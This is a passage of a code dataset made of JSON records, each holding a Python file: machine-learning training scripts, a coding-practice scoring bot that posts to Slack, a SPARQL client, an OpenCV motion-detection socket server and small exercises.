range(self.number_of_hidden_layers+1)]\n\t\tself.BiasKeys[-1] = 'b_out'\n\t\tself.bias = dict.fromkeys(self.BiasKeys,)\n\t\tfor i in range(len(self.BiasKeys)):\n\t\t\tself.bias[self.BiasKeys[i]] = tf.Variable(tf.constant(0.1, shape = [self.NumberOfNeurons_EachLayer[i+1]]))\n\t\treturn self.bias\n\n\tdef createLayers(self):\n\t\tself.LayerKeys = [('layer_'+str(i)) for i in range(self.number_of_hidden_layers+1)]\n\t\tself.LayerKeys[-1] = 'layer_out'\n\t\tself.Layers = dict.fromkeys(self.LayerKeys,)\n\t\tfor i in range(len(self.LayerKeys)):\n\t\t\tif(i==0):\n\t\t\t\tself.Layers[self.LayerKeys[i]] = tf.add(tf.matmul(self.X,self.weights[self.WeightsKeys[i]]),self.bias[self.BiasKeys[i]])\n\t\t\telse:\n\t\t\t\tself.Layers[self.LayerKeys[i]] = tf.add(tf.matmul(self.Layers[self.LayerKeys[i-1]],self.weights[self.WeightsKeys[i]]),self.bias[self.BiasKeys[i]])\n\t\treturn self.Layers\n\n\tdef createDropoutLayer(self,discard_rate):\n\t\tself.dropout_layer = tf.nn.dropout(self.Layers[self.LayerKeys[-2]],discard_rate)\n\t\treturn self.dropout_layer\n\n \nclass TrainNetwork:\n\n\tdef __init__(self,learningRate,useDropout,num_iter):\n\t\tself.learningRate = learningRate\n\t\tself.useDropout = useDropout\n\t\tself.numberOfIterations = num_iter\n\t\tself.minibatch_accuracy_list = []\n\t\tself.output_accuracy_list = []\n\t\tself.minibatch_loss_list = []\n\t\tself.output_loss_list = []\n\n\t# def get_Session(self):\n\t# \tinit = tf.global_variables_initializer()\n\t# \twith tf.Session() as sess:\n\t# \t\tsess.run(init)\n\t# \t\treturn sess\n\n\tdef set_trainingData(self, X_train,y_train):\n\t\tself.X_train = X_train\n\t\tself.y_train = y_train\n\n\tdef set_dropout(self,dropout_val):\n\t\tself.dropout = dropout_val\n\n\tdef set_validationData(self, X_val,y_val):\n\t\tself.X_val = X_val\n\t\tself.y_val = y_val\n\n\tdef set_testData(self, X_test,y_test):\n\t\tself.X_test = X_test\n\t\tself.y_test = y_test\n\n\tdef set_placeholders(self, X_placeholder, y_placeholder, keep_prob_placeholder):\n\t\tself.X = X_placeholder\n\t\tself.Y = y_placeholder\n\t\tself.keep_prob = keep_prob_placeholder\n\n\tdef get_lossTensor(self, y_placeholder,output_layer):\n\t\tcross_entropy = tf.reduce_mean(tf.losses.softmax_cross_entropy(onehot_labels=y_placeholder, logits= output_layer))\n\t\treturn cross_entropy\n\n\tdef get_optimizerTensor(self, learningRate, lossTensor):\n\t\ttrain_step = tf.train.AdamOptimizer(learningRate).minimize(lossTensor)\n\t\treturn train_step\n\n\tdef get_accuracyTensor(self, y_placeholder,output_layer):\n\t\tcorrect_pred = tf.equal(tf.argmax(output_layer,1),tf.argmax(y_placeholder,1))\n\t\tself.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\t\treturn self.accuracy\n\n\tdef startTraining(self,session,lossTensor,optimizerTensor,accuracyTensor):\n\t\tfor i in range(self.numberOfIterations):\n\t\t\tsession.run(optimizerTensor,feed_dict={\n\t\t\t\tself.X : self.X_train,\n\t\t\t\tself.Y : self.y_train,\n\t\t\t\tself.keep_prob : self.dropout\n\t\t\t\t})\n\n\t\t\tminibatch_loss, minibatch_accuracy = session.run([optimizerTensor, accuracyTensor],feed_dict = {\n\t\t\t\tself.X: self.X_val, \n\t\t\t\tself.Y: self.y_val, \n\t\t\t\tself.keep_prob : 1.0\n\t\t\t\t})\n\t\t\tself.minibatch_accuracy_list.append(minibatch_accuracy)\n\t\t\tself.minibatch_loss_list.append(minibatch_loss)\n\n\t\t\toutput_loss, output_accuracy = session.run([optimizerTensor, accuracyTensor],feed_dict = {\n\t\t\t\tself.X: self.X_test, \n\t\t\t\tself.Y: self.y_test, \n\t\t\t\tself.keep_prob : 1.0 \n\t\t\t\t})\n\t\t\tself.output_accuracy_list.append(output_accuracy)\n\t\t\tself.output_loss_list.append(output_loss)\n\t\t\tprint(\"Iteration\", str(i),\"\\t|Validation Loss = \", str(minibatch_loss),\"\\t|Validation Accuracy =\", str(minibatch_accuracy),\"\\nIteration\", str(i),\"\\t|Test Loss = \", str(output_loss),\"\\t|Test Accuracy =\", str(output_accuracy))\n\t\t\t","sub_path":"ML_Pipeline.py","file_name":"ML_Pipeline.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"514843936","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 10 19:49:25 2019\r\n\r\n@author: 李奇\r\n\"\"\"\r\nimport torch\r\nfrom torch import nn, optim\r\nfrom torch.utils.data import DataLoader\r\nimport numpy as np\r\nimport utils\r\nimport torch.nn.functional as F\r\n\r\ndef conv1x1(in_channels,out_channels,bias=True,groups=1):\r\n return nn.Conv2d(in_channels,out_channels,kernel_size=1,stride=1,padding=0,bias=bias,groups=groups)\r\n\r\nclass CNNmodel(nn.Module):\r\n def __init__(self,input_size=32, class_num=10):\r\n super(CNNmodel, self).__init__()\r\n \r\n self.input_size = input_size\r\n self.class_num = class_num\r\n\r\n self.conv = nn.Sequential(\r\n nn.Conv2d(1, 64, 3,padding=1), \r\n nn.LeakyReLU(0.2),\r\n nn.Conv2d(64, 64, 3, 2, 1), \r\n nn.LeakyReLU(0.2),\r\n #16\r\n \r\n nn.Conv2d(64, 128, 3, padding=1), \r\n nn.LeakyReLU(0.2),\r\n nn.Conv2d(128, 128, 3, 2, 1), \r\n nn.LeakyReLU(0.2),\r\n #8\r\n \r\n nn.Conv2d(128, 256, 3, padding=1),\r\n nn.LeakyReLU(0.2),\r\n nn.Conv2d(256, 256, 3, 2,1), \r\n nn.LeakyReLU(0.2),\r\n )\r\n\r\n self.cla = conv1x1(256,self.class_num)\r\n\r\n utils.initialize_weights(self)\r\n \r\n def forward(self,input,output_flag=True):\r\n x = self.conv(input)\r\n x=F.avg_pool2d(x, x.data.size()[-2:])\r\n c = self.cla(x)\r\n if output_flag:\r\n c=c.view(c.size(0),c.size(1))\r\n return c\r\n else:\r\n return x\r\n\r\nif __name__=='__main__':\r\n net = CNNmodel(input_size=32,class_num=10)\r\n\r\n input = torch.randn(1,1,32,32)\r\n output = net.forward(input)\r\n \r\n utils.print_network(net)\r\n\r\n\r\n ","sub_path":"demo_cnn32/cnn_model.py","file_name":"cnn_model.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"161051038","text":"from subprocess import check_output\n\nfrom subprocess import STDOUT \nimport subprocess\n\nfiles = [\"GoodWalk.qk\"\n,\"LexChallenge.qk\"\n,\"Pt.qk\"\n,\"Sqr.qk\"\n,\"SqrDecl.qk\"\n,\"TypeWalk.qk\"\n,\"bad_break.qk\"\n,\"bad_escape.qk\"\n,\"bad_init.qk\"\n,\"hands.qk\"\n,\"not_a_duck.qk\"\n,\"robot.qk\"\n,\"schroedinger.qk\"\n,\"schroedinger2.qk\"]\n\nfor f in files:\n out = check_output(\"./scanner {1}{0} >{2}{0}.out 2>{2}{0}.err\".format(f, \"samples/\", \"actual/\"), shell=True)\n\n","sub_path":"Project1/createActual.py","file_name":"createActual.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"482161117","text":"from datetime import datetime, timezone, timedelta\nfrom multiprocessing import Process, Pipe\nfrom baekjoon import parse_submitted_problems, ResultType\nimport slack, db, setting\nimport os\n\nis_debug_mode = os.getenv(\"IS_DEBUG_MODE\").lower()==\"true\"\n\ndef get_solved_problems_by_user(user: dict, submitted_problems: list):\n solved = []\n\n for problem in submitted_problems:\n # 문제가 이전에 풀었던 문제 목록에 있다면 제출로 인정하지 않음\n if problem['problem_id'] in user['solved_problems'] and not is_debug_mode:\n continue\n\n if any(map(lambda p: p['problem_id'] == problem['problem_id'], solved)):\n continue\n\n solved.append(problem)\n\n return solved\n\ndef scoring_user(user: dict, start_date: datetime, end_date: datetime):\n correct_problems = parse_submitted_problems(user['user_id'], start_date, end_date, ResultType.Correct)\n solved_problems = get_solved_problems_by_user(user, correct_problems)\n\n has_submitted = len(solved_problems) > 0\n\n result = { \n 'user_id': user['user_id'],\n 'user_name': user['user_name'],\n 'has_submitted': has_submitted\n }\n \n if has_submitted:\n result['solved_problems'] = solved_problems\n result['is_mvp'] = False\n\n print(\"[채점 결과] %s(%s): %d 문제 채점 기록 확인\" % (user['user_name'], user['user_id'], len(solved_problems)))\n else:\n result['fine'] = 1000\n result['total_fine'] = int(user[\"fine\"]) + 1000\n\n print(\"[채점 결과] %s(%s): 벌금 %s원 누적(총 %s원)\" % (user['user_name'], user['user_id'], format(result['fine'],\",\"), format(result['total_fine'],\",\")))\n\n return result\n\ndef post_slack(scoring_results: dict):\n users = len(scoring_results)\n\n submitted = sum(map(lambda result: int(result['has_submitted']), scoring_results))\n unsubmitted = users - submitted\n\n submitted_messages = [\n slack.create_solved_message(\n result['user_id'],\n result['user_name'],\n result['solved_problems'],\n result['is_mvp']\n ) for result in filter(lambda r: r['has_submitted'], scoring_results)\n ]\n\n unsubmitted_messages = [\n slack.create_unsolved_message(\n result['user_id'],\n result['user_name'],\n result['fine'],\n result['total_fine']\n ) for result in filter(lambda r: not r['has_submitted'], scoring_results)\n ]\n\n slack.post_message('📑 문제 검사가 종료되었습니다. ', attachments=[{\n \"text\": '전체 인원 %d명중, 제출은 %d명 미제출은 %d명입니다.' % (users, submitted, unsubmitted)\n }])\n\n slack.post_message('📬 제출', attachments=submitted_messages)\n\n slack.post_message('👮‍♀️ 미제출', attachments=unsubmitted_messages)\n\n slack.post_message('📊 벌금통계', attachments=[\n slack.create_chart_message(db.get_all_user())\n ])\n\ndef run():\n if is_debug_mode:\n print(\"[채점 설정] 디버그 모드 켜짐\")\n \n tz = timezone(timedelta(hours=9))\n\n today = datetime.now(tz=tz)\n yesterday = today - timedelta(days=1)\n\n start_date = datetime(yesterday.year, yesterday.month, yesterday.day, tzinfo=tz)\n end_date = datetime(today.year, today.month, today.day, tzinfo=tz)\n\n print(\"[채점 설정] 채점 기간 %s~%s\" % (start_date, end_date))\n\n users = db.get_all_user()\n\n scoring_results = []\n for user in users:\n scoring_results.append(scoring_user(user, start_date, end_date))\n\n print(\"[채점 완료] DB 업데이트 시작\")\n\n # Update scroing result to db\n if not is_debug_mode:\n for result in scoring_results:\n if result['has_submitted']:\n db.update_user_solve_problems_by_id(result['user_id'], list(map(lambda p: p['problem_id'], result['solved_problems'])))\n else:\n db.update_user_fine_by_id(result['user_id'], result['fine'], today)\n\n print(\"[채점 완료] DB 업데이트 종료\")\n\n print(\"[채점 완료] 슬랙 포스트 시작\")\n\n # Post to slack channel\n post_slack(scoring_results)\n\n print(\"[채점 완료] 슬랙 포스트 종료\")\n\n\nif __name__ == \"__main__\":\n run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"379842125","text":"import pylab as pl\nimport matplotlib.patches as pt\nimport numpy as np,random as rd\ndef fy(t,k,a,b,c,q,n): \n return np.cos(np.pi*t/n+2*k*np.pi/q)+\\\n np.cos(a*np.pi*t/n+2*k*np.pi/q)+\\\n np.cos(b*np.pi*t/n+2*k*np.pi/q)+\\\n np.cos(c*np.pi*t/n+2*k*np.pi/q)\ndef fx(t,k,a,b,c,q,n): \n return np.sin(np.pi*t/n+2*k*np.pi/q)-\\\n np.sin(a*np.pi*t/n+2*k*np.pi/q)+\\\n np.sin(b*np.pi*t/n+2*k*np.pi/q)-\\\n np.sin(c*np.pi*t/n+2*k*np.pi/q)\ndef rotated_polygon(fig_size):\n a,b,c,q=rd.randint(5,9),rd.randint(10,14),\\\n rd.randint(15,19),2*rd.randint(3,6) \n n=rd.randint(5,17); yl=5.5\n st='$\\mathbb{a=%d; \\; b=%d; \\; c=%d;'+\\\n ' \\; q=%d; \\; n=%d}$'\n L=np.array([[[fx(t,k,a,b,c,q,n),fy(t,k,a,b,c,q,n)] \n for t in range(2*n)] \n for k in range(2*q)])\n LT=[[[1.5*fx(t,k,a,b,c,q,n),1.2*fy(t,k,a,b,c,q,n)] \n for t in range(2*n)] for k in range(2*q)]\n pl.figure(figsize=(fig_size,fig_size))\n ax=pl.gca(); pl.axis('off')\n for k in range(2*q):\n col=np.array([rd.randint(100,900)/1000 \n for l in range(2)]+[1])\n ax.add_patch(pt.Polygon(\n LT[k],alpha=.1,color=col))\n ax.add_patch(pt.Polygon(\n L[k],fill=False,color=col/2,lw=.3))\n pl.title(st%(a,b,c,q,n),\n fontdict={'color':'#9911ff','fontsize':20})\n pl.xlim(-yl,yl); pl.ylim(-yl,yl); pl.show()","sub_path":"python_recipes/rotated_polygon.py","file_name":"rotated_polygon.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"168599771","text":"#-*- coding: utf-8 -*-\n\nimport sys, os\nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\n\nfrom keras.utils import np_utils\nfrom keras.models import load_model\nfrom PIL import Image\nimport numpy as np\n\n\nf = open('../../Classify_ulf/list_category_cloth.csv','r')\n\nwhile(True):\n lines = f.read().splitlines()\n if not lines:\n break\n\n categories = []; tmp_cat = []\n for i, d in enumerate(lines):\n tmp = lines[i]\n num_index = len(lines[i]) - 2 \n tmp_cat = tmp[:num_index]\n categories.append(tmp_cat)\n categories.sort()\n\nf.close()\n\nimage_files = ['../../test_img/category_test/greentee.png']\n#image_files = ['../category_test/stripe.jpg','../category_test/denim_pants.png','../category_test/red_dress.jpg','../category_test/red_skirt.png','../category_test/floral_skirt.png','../category_test/navy_pants.png']\n\nimage_size = 64\n\nX = []; files = []\n\nfor fname in image_files:\n img = Image.open(fname)\n img = img.convert(\"RGB\")\n img = img.resize((image_size, image_size))\n in_data = np.asarray(img)\n in_data = in_data.astype(\"float\") / 256\n X.append(in_data)\n files.append(fname)\n\nX = np.array(X)\n\nmodel = load_model('../category_50/clothes_category_model_server_03.h5')\n\npre = model.predict(X)\n\nfor i, p in enumerate(pre):\n y = p.argmax()\n print(\"입력:\", files[i]) # 정답\n print(\"예측:\", \"[\", y, \"]\",categories[y], \"/ Score\",p[y])\n\n\n","sub_path":"server_deepfashion_clothes_type_model_run.py","file_name":"server_deepfashion_clothes_type_model_run.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"263352760","text":"import json, urllib, urllib2\nimport math\n\nsparql_endpoint = \"http://data.linkedtv.eu/sparql\"\neditor_tool_attribution = \"\"\n\ndef fetchChapters(id):\n query = chapterQuery(id, False)\n params = {\n \"query\": query,\n \"format\": 'json'\n }\n request = urllib2.Request(sparql_endpoint + '?' + urllib.urlencode(params))\n response = urllib2.urlopen(request)\n data = json.load(response)\n chapters = []\n if data[\"results\"][\"bindings\"]:\n for chapter in data[\"results\"][\"bindings\"]:\n chapters.append(chapterData(chapter))\n\n return chapters\n\ndef chapterData(data):\n url = data[\"chapter\"][\"value\"]\n id = url.split('/')[-1]\n print('chapter '+id)\n startTime = float(data[\"start\"][\"value\"]) * 1000\n if math.isnan(startTime): startTime = 0.0\n endTime = float(data[\"end\"][\"value\"]) * 1000\n\n chapter = {\n \"id\": id,\n \"startTime\": startTime,\n \"endTime\": endTime,\n \"duration\": endTime - startTime,\n \"title\": data[\"label\"][\"value\"]\n }\n if \"poster\" in data:\n chapter[\"image\"] = data[\"poster\"][\"value\"];\n \n return chapter\n\ndef chapterQuery(videoId, attribution):\n if not(attribution):\n attribution = '?attribution'\n\n query = \"\"\" PREFIX linkedtv: \n PREFIX ma: \n PREFIX nsa: \n PREFIX oa: \n PREFIX prov: \n SELECT DISTINCT ?chapter ?start ?end ?label ?poster\n WHERE {\n ?mediafragment ma:isFragmentOf .\n ?annotation oa:hasTarget ?mediafragment .\n ?annotation oa:hasBody ?chapter .\n ?chapter a linkedtv:Chapter .\n ?mediafragment nsa:temporalStart ?start .\n ?mediafragment nsa:temporalEnd ?end .\n ?chapter rdfs:label ?label .\n ?annotation prov:wasAttributedTo %s .\n OPTIONAL {?chapter linkedtv:hasPoster ?poster }\n } ORDER BY ?start \n \"\"\" % (videoId, attribution)\n\n return query\n\n\ndef fetchFragments(videoId, start, end):\n start = int(start/1000)-2\n end = int(end/1000)+2\n query = fragmentQuery(videoId, start, end, False)\n params = {\n \"query\": query,\n \"format\": 'json'\n }\n request = urllib2.Request(sparql_endpoint + '?' + urllib.urlencode(params))\n response = urllib2.urlopen(request)\n data = json.load(response)\n fragments = []\n if data[\"results\"][\"bindings\"]:\n for fragment in data[\"results\"][\"bindings\"]:\n if \"dbpedia.org\" in fragment[\"uri\"][\"value\"]:\n fragments.append(fragmentData(fragment))\n return fragments\n\ndef fragmentData(fragment):\n startTime =float(fragment[\"start\"][\"value\"]) * 1000\n endTime = float(fragment[\"end\"][\"value\"]) * 1000\n \n data = {\n \"title\": fragment[\"label\"][\"value\"],\n \"uri\": fragment[\"uri\"][\"value\"],\n \"startTime\": startTime,\n \"endTime\": endTime,\n \"duration\": endTime - startTime,\n \"confidence\": fragment[\"confidence\"][\"value\"],\n \"relevance\": fragment[\"relevance\"][\"value\"]\n }\n return data\n\ndef fragmentQuery(videoId, start, end, attribution):\n if not(attribution):\n attribution = '?attribution'\n\n query = \"\"\" PREFIX rdf: \n PREFIX rdfs: \n PREFIX owl: \n PREFIX linkedtv: \n PREFIX ma: \n PREFIX oa: \n PREFIX prov: \n SELECT ?item ?uri ?label ?start ?end ?confidence ?relevance\n WHERE { \n ?mediafragment ma:isFragmentOf . \n ?annotation oa:hasTarget ?mediafragment . \n ?annotation oa:hasBody ?item . \n ?item rdf:type linkedtv:Entity . \n ?item rdfs:label ?label .\n ?item owl:sameAs ?uri . \n ?item linkedtv:hasConfidence ?confidence . FILTER (?confidence > 0.4)\n ?item linkedtv:hasRelevance ?relevance . FILTER (?relevance >= 0.2)\n ?mediafragment nsa:temporalStart ?start . FILTER (?start >= %s)\n ?mediafragment nsa:temporalEnd ?end . FILTER (?end <= %s)\n ?annotation prov:wasAttributedTo %s .\n } ORDER BY ?start\n \"\"\" % (videoId, start, end, attribution)\n return query\n\n\n#fetchChapters('adb65e0a-642b-432f-aa86-c296dab0375a')\n#fetchFragments('8a8187f2-3fc8-cb54-0140-7dccd76f0001', 0.0, 240000)","sub_path":"linkedtv_platform.py","file_name":"linkedtv_platform.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"157216032","text":"import socket\nimport sys\nimport cv2\nimport pickle\nimport numpy as np\nimport struct ## new\nimport zlib\n\n# image transfer : https://gist.github.com/kittinan/e7ecefddda5616eab2765fdb2affed1b\n# motion detection: geeksforgeeks.org/webcam-motion-detector-python/\n\nHOST=''\nPORT=8485\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nprint('Socket created')\n\ns.bind((HOST,PORT))\nprint('Socket bind complete')\ns.listen(10)\nprint('Socket now listening')\n\nconn,addr=s.accept()\n\ndata = b\"\"\npayload_size = struct.calcsize(\">L\")\nprint(\"payload_size: {}\".format(payload_size))\n\n# Assigning our static_back to None \nstatic_back = None\n \n# List when any moving object appear \nmotion_list = [ None, None ] \n\nwhile True:\n while len(data) < payload_size:\n print(\"Recv: {}\".format(len(data)))\n data += conn.recv(4096)\n\n print(\"Done Recv: {}\".format(len(data)))\n packed_msg_size = data[:payload_size]\n data = data[payload_size:]\n msg_size = struct.unpack(\">L\", packed_msg_size)[0]\n print(\"msg_size: {}\".format(msg_size))\n while len(data) < msg_size:\n data += conn.recv(4096)\n frame_data = data[:msg_size]\n data = data[msg_size:]\n\n frame=pickle.loads(frame_data, fix_imports=True, encoding=\"bytes\")\n frame = cv2.imdecode(frame, cv2.IMREAD_COLOR)\n\n\n # -------------\n motion = 0\n # Converting color image to gray_scale image \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) \n \n # Converting gray scale image to GaussianBlur \n # so that change can be find easily \n gray = cv2.GaussianBlur(gray, (21, 21), 0) \n \n # In first iteration we assign the value \n # of static_back to our first frame \n if static_back is None: \n static_back = gray \n continue\n \n # Difference between static background \n # and current frame(which is GaussianBlur) \n diff_frame = cv2.absdiff(static_back, gray) \n \n # If change in between static background and \n # current frame is greater than 30 it will show white color(255) \n thresh_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)[1] \n thresh_frame = cv2.dilate(thresh_frame, None, iterations = 2) \n \n # Finding contour of moving object \n cnts, _ = cv2.findContours(thresh_frame.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) \n \n for contour in cnts: \n if cv2.contourArea(contour) < 10000: \n continue\n motion = 1\n \n (x, y, w, h) = cv2.boundingRect(contour) \n # making green rectangle arround the moving object \n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3) \n \n # Appending status of motion \n motion_list.append(motion) \n \n motion_list = motion_list[-2:] \n\n\n\n # ----------\n\n\n\n \n cv2.imshow('ImageWindow',frame)\n cv2.waitKey(1)","sub_path":"src/rspCamPatt/nServer.py","file_name":"nServer.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"23781479","text":"from scipy.sparse.csgraph import shortest_path\nfrom scipy.sparse import csr_matrix\nimport sys\n\ndef get_path(start, goal, pred):\n return get_path_row(start, goal, pred[start])\n\ndef get_path_row(start, goal, pred_row):\n path = []\n i = goal\n while i != start and i >= 0:\n path.append(i)\n i = pred_row[i]\n if i < 0:\n return []\n path.append(i)\n return path[::-1]\n\nN, M = map(int, input().split())\nA = []\nB = []\nneighbor = [[0 for x in range(N)] for y in range(N)]\nfor i in range(M):\n a, b = map(lambda x: int(x)-1, input().split())\n neighbor[a][b] = 1\n neighbor[b][a] = 1\n\nneighbor = csr_matrix(neighbor)\n\nans = []\nd, p = shortest_path(neighbor, return_predecessors=True, indices=0)\n\nfor i in range(1,N):\n if p[i]<0:\n print(\"No\")\n sys.exit(0)\n else:\n ans.append(p[i]+1)\nprint(\"Yes\")\nfor i in range(N-1):\n print(ans[i])\n","sub_path":"atcoder/ABC/168/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"54465622","text":"# f = lambda:map(int, input().split())\n# n, m = f()\n#\n# g = [''] * n\n#\n# for i in range(n):\n# g[i] = input()\n\nn = 9\nm = 11\nv = [[0] * m for i in range(n)]\ng = ['.#.........',\n '.#.#######.',\n '.#.#.....#.',\n '.#.#.###.#.',\n '.#.#..@#.#.',\n '.#.#####.#.',\n '.#.......#.',\n '.#########.',\n '...........']\n\n# 找到起点\nsi, sj = 0, 0\nfor i in range(n):\n for j in range(m):\n if g[i][j] == '@':\n si = i\n sj = j\nprint('节点坐标:')\nprint(si, sj)\n\n# 节点访问顺序\nl = []\n\n\ndef bfs(i, j):\n c = 0\n # Q为重点\n Q = [(i, j)]\n while Q:\n c += 1\n i, j = Q[0]\n l.append((i, j))\n # print(g[i][j])\n # 对上下左右的点进行判断,将为访问、不再等待访问队列Q中、且值为 '.' 的节点,加入Q中\n if 0 < j and not v[i][j-1] and (i, j-1) not in Q and g[i][j-1] == '.':\n Q.append((i, j-1))\n if j < m-1 and not v[i][j+1] and (i, j+1) not in Q and g[i][j+1] == '.':\n Q.append((i, j+1))\n if 0 < i and not v[i-1][j] and (i-1, j) not in Q and g[i-1][j] == '.':\n Q.append((i-1, j))\n if i < n-1 and not v[i+1][j] and (i+1, j) not in Q and g[i+1][j] == '.':\n Q.append((i+1, j))\n # mark (i, j)\n v[i][j] = 1\n # 将访问结束的节点从Q中去除\n Q.remove((i, j))\n return c\n\n\n# 从起点开始dfs\nprint(bfs(si, sj))\nprint('节点访问顺序:')\nprint(l)","sub_path":"algorithm/广度优先搜索(BFS)/nxm的地图.py","file_name":"nxm的地图.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"624241458","text":"class Animal(object):\n def __init__(self, name, weight):\n self.name = name\n self.size = None\n self.weight = weight\n self.species = None\n self.food_type = None\n self.nocturnal = False\n\n def sleep(self):\n if self.sleep:\n print(\"{} sleeps at day time\".format(self.name))\n else:\n print(\"{} sleeps at night time\".format(self.name))\n\n def eat(self, food):\n if self.food_type == 'omnivore':\n print(\"{} the {} thinks {} is Yummy!\".format(self.name, self.species, food))\n elif (food == 'meat' and self.food_type == \"carnivore\") or \\\n (food == 'plants' and self.food_type == 'herbivore'):\n print(\"{} the {} thinks {} is Yummy!\".format(self.name, self.species, food))\n else:\n print('I do not eat this!')\n\n\nclass Elephant(Animal):\n def __init__(self, name, weight):\n super().__init__(name, weight)\n self.species = 'elephant'\n self.size = 'enormous'\n self.food_type = 'herbivore'\n self.nocturnal = False\n\n\nclass Tiger(Animal):\n def __init__(self, name, weight):\n super().__init__(name, weight)\n self.species = 'tiger'\n self.size = 'large'\n self.food_type = 'carnivore'\n self.nocturnal = True\n\n\nclass Raccoon(Animal):\n def __init__(self, name, weight):\n super().__init__(name, weight)\n self.species = 'raccoon'\n self.size = 'small'\n self.food_type = 'omnivore'\n self.nocturnal = True\n\n\nclass Gorilla(Animal):\n def __init__(self, name, weight):\n super().__init__(name, weight)\n self.species = 'gorilla'\n self.size = 'large'\n self.food_type = 'herbivore'\n self.nocturnal = False\n\n\ndef add_animal_to_zoo(zoo, animal_type, name, weight):\n if animal_type is \"Gorilla\":\n animal = Gorilla(name, weight)\n elif animal_type is \"Raccoon\":\n animal = Raccoon(name, weight)\n elif animal_type is \"Tiger\":\n animal = Tiger(name, weight)\n else:\n animal = Elephant(name, weight)\n\n return zoo.append(animal)\n\n\ndef feed_animals(zoo, time='Day'):\n for animal in zoo:\n if time == 'Day':\n if not animal.nocturnal:\n if animal.food_type is 'carnivore':\n animal.eat('meat')\n else:\n animal.eat('plants')\n else:\n if animal.nocturnal:\n if animal.food_type is 'carnivore':\n animal.eat('meat')\n else:\n animal.eat('plants')\n\n\nzoo = []\n\nadd_animal_to_zoo(zoo, 'Elephant', \"dumbo1\", 200)\nadd_animal_to_zoo(zoo, 'Elephant', \"dumbo1\", 520)\nadd_animal_to_zoo(zoo, 'Raccoon', \"raccoon1\", 20)\nadd_animal_to_zoo(zoo, 'Raccoon', \"raccoon2\", 12)\nadd_animal_to_zoo(zoo, 'Gorilla', \"gorilla\", 120)\nadd_animal_to_zoo(zoo, \"Tiger\", \"tiger1\", 70)\nadd_animal_to_zoo(zoo, \"Tiger\", \"tiger2\", 80)\nadd_animal_to_zoo(zoo, \"Tiger\", \"tiger3\", 75)\n\nfeed_animals(zoo)\nfeed_animals(zoo, 'Night')\n","sub_path":"sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"449988190","text":"import numpy as np\nfrom obspy import Stream, UTCDateTime\nfrom pydantic import BaseModel\nfrom typing import Any, List, Optional\n\nfrom ..residual.Reading import Reading, get_absolutes_xyz, get_ordinates\nfrom .. import ChannelConverter\nfrom .. import pydantic_utcdatetime\nfrom .Metric import Metric, get_metric\n\n\nclass AdjustedMatrix(BaseModel):\n \"\"\"Attributes pertaining to adjusted(affine) matrices, applied by the AdjustedAlgorithm\n\n Attributes\n ----------\n matrix: affine matrix generated by Affine's calculate method\n pier_correction: pier correction generated by Affine's calculate method\n starttime: beginning of interval that matrix is valid for\n endtime: end of interval that matrix is valid for\n NOTE: valid intervals are only generated when bad data is encountered.\n Matrix is non-constrained otherwise\n \"\"\"\n\n matrix: Optional[List[List[float]]] = None\n pier_correction: float = 0\n metrics: Optional[List[Metric]] = None\n starttime: Optional[UTCDateTime] = None\n endtime: Optional[UTCDateTime] = None\n time: Optional[UTCDateTime] = None\n\n def process(\n self,\n stream: Stream,\n inchannels=[\"H\", \"E\", \"Z\", \"F\"],\n outchannels=[\"X\", \"Y\", \"Z\", \"F\"],\n ):\n \"\"\"Apply matrix to raw data. Apply pier correction to F when necessary\"\"\"\n raws = np.vstack(\n [\n stream.select(channel=channel)[0].data\n for channel in inchannels\n if channel != \"F\"\n ]\n + [np.ones_like(stream[0].data)]\n )\n adjusted = self.matrix @ raws\n if \"F\" in inchannels and \"F\" in outchannels:\n f = stream.select(channel=\"F\")[0].data + self.pier_correction\n adjusted[-1] = f\n return adjusted\n\n def get_metrics(self, readings: List[Reading]) -> List[Metric]:\n \"\"\"Computes mean absolute error and standard deviation between expected and predicted values\n Metrics are computed for X, Y, Z, and dF values\n\n Attributes\n ----------\n readings: list of valid readings\n matrix: composed matrix\n\n Outputs\n -------\n metrics: list of Metric objects\n \"\"\"\n absolutes = get_absolutes_xyz(readings=readings)\n ordinates = get_ordinates(readings=readings)\n stacked_ordinates = np.vstack((ordinates, np.ones_like(ordinates[0])))\n predicted = self.matrix @ stacked_ordinates\n metrics = []\n elements = [\"X\", \"Y\", \"Z\", \"dF\"]\n expected = list(absolutes) + [\n ChannelConverter.get_computed_f_using_squares(*absolutes)\n ]\n predicted = list(predicted[0:3]) + [\n 